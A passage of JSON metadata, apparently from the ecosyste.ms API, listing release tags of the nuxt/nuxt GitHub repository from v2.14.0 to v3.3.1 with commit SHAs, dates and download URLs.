pi/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"2ebf5f4c4488c911e8bcc273cb8b12b86bf3562e","kind":"commit","published_at":"2023-03-14T13:22:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0/manifests"},{"name":"v2.16.2","sha":"ca8b375e2eb38c452b1b227e83c2cdad6de2f030","kind":"tag","published_at":"2023-03-01T13:03:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2/manifests"},{"name":"v3.2.3","sha":"021ba4310e47301996967c2a9b581152095cb995","kind":"commit","published_at":"2023-02-28T11:19:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3/manifests"},{"name":"v3.2.2","sha":"3a832bacb8f747bc3df656ddb926defe607b07f3","kind":"commit","published_at":"2023-02-17T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2/manifests"},{"name":"v3.2.1","sha":"5c47d4c5ab0add324a412c9d64700acf41b41f5b","kind":"commit","published_at":"2023-02-17T15:56:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1/manifests"},{"name":"v2.16.1","sha":"41148648ee597424c94a31ce0f36bb742c5ec695","kind":"commit","published_at":"2023-02-13T12:08:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1/manifests"},{"name":"v3.2.0","sha":"5855c1ed53ae1336fcfeb118a27c7201a9b83949","kind":"commit","published_at":"2023-02-09T10:55:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0/manifests"},{"name":"v3.1.2","sha":"225988ebd56aedf831b37bfce293ba76814ddb59","kind":"commit","published_at":"2023-02-03T12:56:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2/manifests"},{"name":"v2.16.0","sha":"6dc6cef9abd17346498d41572dd47a4fd99c900d","kind":"tag","published_at":"2023-02-03T12:48:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0/manifests"},{"name":"3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1/manifests"},{"name":"v3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"c552d1b420caaac0184fd5c332ebc55b0b0d77ad","kind":"commit","published_at":"2023-01-24T16:47:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"d991a55ec36f5ac61de0af7d0b018a150153445b","kind":"commit","published_at":"2022-11-16T14:56:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.14","sha":"0faeb3b5a33203d543de32bf1b9a40b394b979ab","kind":"commit","published_at":"2022-11-16T02:38:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.14","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.14","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14/manifests"},{"name":"v3.0.0-rc.13","sha":"bde96947333501c22a5e981515bd27c24eb8b88f","kind":"commit","published_at":"2022-11-04T11:37:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.13","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.13","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13/manifests"},{"name":"v3.0.0-rc.12","sha":"09e553467e970a3bbd092698640c96ddf86d596b","kind":"commit","published_at":"2022-10-18T18:47:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12/manifests"},{"name":"v3.0.0-rc.11","sha":"6309d223bb247764e32e90d196aca5fd4b913805","kind":"commit","published_at":"2022-09-20T16:38:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11/manifests"},{"name":"v3.0.0-rc.10","sha":"94377b190180922c8156f6753512362392b3552d","kind":"commit","published_at":"2022-09-14T16:27:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10/manifests"},{"name":"v3.0.0-rc.9","sha":"9caa9ca31fca90a775d316bfc68ac98952d82942","kind":"commit","published_at":"2022-09-03T10:36:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9/manifests"},{"name":"v3.0.0-rc.8","sha":"3960f513c377e1ef5d47986a13c1c66c1eaa1afc","kind":"commit","published_at":"2022-08-12T13:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8/manifests"},{"name":"v3.0.0-rc.7","sha":"5ea0474225c3591cd743f51a72aa2cd7597ec0e4","kind":"commit","published_at":"2022-08-11T10:40:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7/manifests"},{"name":"v3.0.0-rc.6","sha":"88f4525a4fa7dc1595e85b0cfffdd441aa6970ed","kind":"commit","published_at":"2022-07-18T10:06:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6/manifests"},{"name":"v3.0.0-rc.5","sha":"65e6b1439e14a196d8b15db51939c65d934532e7","kind":"commit","published_at":"2022-07-13T15:40:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5/manifests"},{"name":"v3.0.0-rc.4","sha":"be0e502a05a9c8bb2eeaa62459d611f6363be89f","kind":"commit","published_at":"2022-06-13T14:27:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4/manifests"},{"name":"v3.0.0-rc.3","sha":"36512d0eaaa32e0dd1d0887098fcf842a7fa66b1","kind":"commit","published_at":"2022-05-10T08:58:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3/manifests"},{"name":"v3.0.0-rc.2","sha":"a8d42d586f84b7cef66c7bf8b76eb560139e6f88","kind":"commit","published_at":"2022-05-02T20:47:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"0c2f07695702df33a63b88322d93d6815a227a0f","kind":"commit","published_at":"2022-04-20T21:09:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1/manifests"},{"name":"v2.15.8","sha":"d4b9e4b0553bcd617ecbc0b8b76871070b347fcb","kind":"tag","published_at":"2021-08-11T21:10:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8/manifests"},{"name":"v2.15.7","sha":"4f370e2043b7731db0e8ef65a4f88431cd8795f3","kind":"tag","published_at":"2021-06-14T13:59:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7/manifests"},{"name":"v2.15.6","sha":"0eae970e74f1fbf29f400a3178f54061a79bfac2","kind":"tag","published_at":"2021-05-12T10:47:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6/manifests"},{"name":"v2.15.5","sha":"0460a278ab5258f0cd6d3fe8fc014f892b2bdaf6","kind":"tag","published_at":"2021-05-09T08:17:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5/manifests"},{"name":"v2.15.4","sha":"b39dcda6adf21e4eb82caef7895440755c6d96fc","kind":"tag","published_at":"2021-04-01T11:23:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4/manifests"},{"name":"v2.15.3","sha":"24a0c7e27123874f9545c46852b2e7d34920b017","kind":"tag","published_at":"2021-03-10T12:25:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3/manifests"},{"name":"v2.15.2","sha":"b7f9cdc2a44dbf25b1bd1845fdc8ebb65b0f0754","kind":"tag","published_at":"2021-02-23T09:20:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2/manifests"},{"name":"v2.15.1","sha":"95daddf43c3b9e9474870631727755ecd2e94319","kind":"tag","published_at":"2021-02-19T16:39:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1/manifests"},{"name":"v2.15.0","sha":"dcfb42b77221f559e7ccb09edd5c2a2004c5bc6b","kind":"tag","published_at":"2021-02-15T11:06:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0/manifests"},{"name":"v2.14.12","sha":"bde4c5f6b0e643716d97027cdd185891ada02f7f","kind":"tag","published_at":"2020-12-16T13:15:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12/manifests"},{"name":"v2.14.11","sha":"d85f4b92642f4668463deb286524d424e57a1f62","kind":"tag","published_at":"2020-12-09T23:21:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11/manifests"},{"name":"v2.14.10","sha":"e97051adfafb9517cabbfd9b87a02e8c37ce949e","kind":"tag","published_at":"2020-12-07T10:30:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10/manifests"},{"name":"v2.14.9","sha":"e9f380c9e6b729ab77b38babba6ad15e95b4efa8","kind":"tag","published_at":"2020-12-02T10:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9/manifests"},{"name":"v2.14.8","sha":"68d8fb84872b807b2149756bb97a84961854a2c3","kind":"tag","published_at":"2020-12-01T11:06:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8/manifests"},{"name":"v2.14.7","sha":"265d0e7aac3df9f83f323c4d2dba11434956fe9b","kind":"tag","published_at":"2020-10-15T16:29:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7/manifests"},{"name":"v2.14.6","sha":"41176577ad71a8b91a91ca8f458fd64a278dd88d","kind":"tag","published_at":"2020-09-21T10:46:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6/manifests"},{"name":"v2.14.5","sha":"3b037720f2edc3e351d200bbb8525df1e93d7aad","kind":"tag","published_at":"2020-09-10T12:36:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5/manifests"},{"name":"v2.14.4","sha":"1a77fba4eb247faa3f1c8ec0fa49ce372abeb1d8","kind":"tag","published_at":"2020-08-27T10:26:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4/manifests"},{"name":"v2.14.3","sha":"5e9d759d7bee6a3d32e16ef05eef988e882c600a","kind":"tag","published_at":"2020-08-16T17:04:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3/manifests"},{"name":"v2.14.2","sha":"34c56722c8c97c0c6a59ecfbc5836c38047e4572","kind":"tag","published_at":"2020-08-16T10:59:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2/manifests"},{"name":"v2.14.1","sha":"c30499d7e02cd6d8b51d97ee7d7a537d8a59f63b","kind":"tag","published_at":"2020-08-04T16:37:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1/manifests"},{"name":"v2.14.0","sha":"60f68638cb80ab461c5b02be34e8797677bd8dd1","kind":"tag","published_at":"2020-07-27T17:25:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2